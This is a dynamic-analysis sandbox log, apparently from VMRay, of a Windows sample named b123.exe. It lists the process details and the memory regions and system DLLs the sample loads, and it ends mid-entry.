# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 23.03.2022 03:44:44.503 Process: id = "1" image_name = "b123.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe" page_root = "0x6aa91000" os_pid = "0x7fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x4a0" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 123 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 124 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 125 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 126 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 127 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 128 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 129 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 130 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 131 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x42aa70 region_type = mapped_file name = "b123.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe") Region: id = 132 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 133 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 134 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 135 start_va = 0x7fff0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 136 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 137 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 275 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 276 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 277 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 278 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x570000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 281 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x743a0000 end_va = 0x74431fff monitored = 0 entry_point = 0x743e0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 287 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 288 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 289 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 290 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 291 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 292 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 293 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 294 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 295 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 296 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 297 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 298 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 299 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 300 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 301 start_va = 0x500000 end_va = 0x529fff monitored = 0 entry_point = 0x505680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 302 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 303 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 304 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 305 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 306 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 307 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 308 start_va = 0x1ed0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 309 start_va = 0x510000 end_va = 0x538fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 310 start_va = 0x670000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 311 start_va = 0x775a0000 end_va = 0x77717fff monitored = 0 entry_point = 0x775f8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 312 start_va = 0x74810000 end_va = 0x7481dfff monitored = 0 entry_point = 0x74815410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 313 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 314 start_va = 0x6e0b0000 end_va = 0x6e2bcfff monitored = 0 entry_point = 0x6e19acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 315 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 316 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 317 start_va = 0x74ed0000 end_va = 0x74ee2fff monitored = 0 entry_point = 0x74ed1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 318 start_va = 0x74990000 end_va = 0x74995fff monitored = 0 entry_point = 0x74991460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 319 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 320 start_va = 0x6d620000 end_va = 0x6d659fff monitored = 0 entry_point = 0x6d639be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 321 start_va = 0x74020000 end_va = 0x740e7fff monitored = 0 entry_point = 0x7408ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 322 start_va = 0x756e0000 end_va = 0x76adefff monitored = 0 entry_point = 0x7589b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 323 start_va = 0x75120000 end_va = 0x75156fff monitored = 0 entry_point = 0x75123b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 324 start_va = 0x749a0000 end_va = 0x74e98fff monitored = 0 entry_point = 0x74ba7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 325 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 326 start_va = 0x751c0000 end_va = 0x7524cfff monitored = 0 entry_point = 0x75209b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 327 start_va = 0x75370000 end_va = 0x753b3fff monitored = 0 entry_point = 0x75377410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 328 start_va = 0x75250000 end_va = 0x7525efff monitored = 0 entry_point = 0x75252e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 329 start_va = 0x6cbb0000 end_va = 0x6cd1afff monitored = 0 entry_point = 0x6cc1e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 330 start_va = 0x74720000 end_va = 0x7480afff monitored = 0 entry_point = 0x7475d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 331 start_va = 0x1ed0000 end_va = 0x1f60fff monitored = 0 entry_point = 0x1f08cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 332 start_va = 0x1fb0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 333 start_va = 0x6ca70000 end_va = 0x6cbaefff monitored = 0 entry_point = 0x6ca9d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 334 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 335 start_va = 0x6d490000 end_va = 0x6d497fff monitored = 0 entry_point = 0x6d491c60 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 336 start_va = 0x1ed0000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 337 start_va = 0x1fc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 338 start_va = 0x20c0000 end_va = 0x84bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 339 start_va = 0x71fb0000 end_va = 0x7227afff monitored = 0 entry_point = 0x721ec4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 340 start_va = 0x84c0000 end_va = 0x87f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 341 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 342 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 343 start_va = 0x1f10000 end_va = 0x1f10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 344 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 345 start_va = 0x6e090000 end_va = 0x6e0a1fff monitored = 0 entry_point = 0x6e094510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 346 start_va = 0x71e70000 end_va = 0x71e9efff monitored = 0 entry_point = 0x71e7bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 347 start_va = 0x6dff0000 end_va = 0x6e08afff monitored = 0 entry_point = 0x6e02f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 348 start_va = 0x1f20000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 349 start_va = 0x8800000 end_va = 0x88fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 350 start_va = 0x71f30000 end_va = 0x71f7efff monitored = 0 entry_point = 0x71f3d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 351 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 352 start_va = 0x1f70000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 353 start_va = 0x8900000 end_va = 0x89fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008900000" filename = "" Region: id = 354 start_va = 0x6dfe0000 end_va = 0x6dfe7fff monitored = 0 entry_point = 0x6dfe1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 355 start_va = 0x74980000 end_va = 0x74986fff monitored = 0 entry_point = 0x74981e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 356 start_va = 0x71ea0000 end_va = 0x71f23fff monitored = 0 entry_point = 0x71ec6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 357 start_va = 0x70740000 end_va = 0x708bdfff monitored = 0 entry_point = 0x707bc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 358 start_va = 0x8a00000 end_va = 0x8a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008a00000" filename = "" Region: id = 359 start_va = 0x8a10000 end_va = 0x8a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a10000" filename = "" Region: id = 360 start_va = 0x8a50000 end_va = 0x8b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a50000" filename = "" Region: id = 361 start_va = 0x71e10000 end_va = 0x71e56fff monitored = 0 entry_point = 0x71e258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 362 start_va = 0x71e60000 end_va = 0x71e67fff monitored = 0 entry_point = 0x71e61920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 363 start_va = 0x8b50000 end_va = 0x8b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008b50000" filename = "" Region: id = 364 start_va = 0x8b60000 end_va = 0x8b60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008b60000" filename = "" Region: id = 365 start_va = 0x8b70000 end_va = 0x8f6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008b70000" filename = "" Region: id = 366 start_va = 0x8f70000 end_va = 0x8f77fff monitored = 0 entry_point = 0x8f719c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 367 start_va = 0x8f70000 end_va = 0xeeddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f70000" filename = "" Region: id = 368 start_va = 0xeee0000 end_va = 0xef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eee0000" filename = "" Region: id = 369 start_va = 0xef90000 end_va = 0xf086fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ef90000" filename = "" Region: id = 370 start_va = 0x60900000 end_va = 0x60991fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000060900000" filename = "" Region: id = 371 start_va = 0xf090000 end_va = 0xf18cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f090000" filename = "" Region: id = 372 start_va = 0xf190000 end_va = 0xf194fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 373 start_va = 0xf1a0000 end_va = 0xf1affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 374 start_va = 0xf1b0000 end_va = 0xf33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1b0000" filename = "" Region: id = 375 start_va = 0x706b0000 end_va = 0x70724fff monitored = 0 entry_point = 0x706e9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 376 start_va = 0xf1b0000 end_va = 0xf24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1b0000" filename = "" Region: id = 377 start_va = 0xf330000 end_va = 0xf33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f330000" filename = "" Region: id = 378 start_va = 0xf1b0000 end_va = 0xf1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1b0000" filename = "" Region: id = 379 start_va = 0xf240000 end_va = 0xf24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 380 start_va = 0xf250000 end_va = 0xf2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f250000" filename = "" Region: id = 381 start_va = 0xf340000 end_va = 0xf43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f340000" filename = "" Region: id = 382 start_va = 0xf440000 end_va = 0xf931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f440000" filename = "" Region: id = 383 start_va = 0xf940000 end_va = 0xfe31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f940000" filename = "" Region: id = 384 start_va = 0x74470000 end_va = 0x7458efff monitored = 0 entry_point = 0x744b5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 385 start_va = 0xf1f0000 end_va = 0xf1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1f0000" filename = "" Region: id = 386 start_va = 0xf940000 end_va = 0xfe36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f940000" filename = "" Region: id = 387 start_va = 0x6c8f0000 end_va = 0x6ca62fff monitored = 0 entry_point = 0x6c99d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 388 start_va = 0xfe40000 end_va = 0xff3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe40000" filename = "" Region: id = 389 start_va = 0xff40000 end_va = 0x1003ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff40000" filename = "" Region: id = 390 start_va = 0x10040000 end_va = 0x10845fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010040000" filename = "" Region: id = 391 start_va = 0xf1b0000 end_va = 0xf1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1b0000" filename = "" Region: id = 392 start_va = 0xf2d0000 end_va = 0xf3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f2d0000" filename = "" Region: id = 393 start_va = 0x723e0000 end_va = 0x7252afff monitored = 0 entry_point = 0x72441660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 394 start_va = 0xf200000 end_va = 0xf200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f200000" filename = "" Region: id = 395 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 396 start_va = 0xf210000 end_va = 0xf210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f210000" filename = "" Region: id = 397 start_va = 0xf220000 end_va = 0xf223fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 398 start_va = 0xf3d0000 end_va = 0xf414fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = 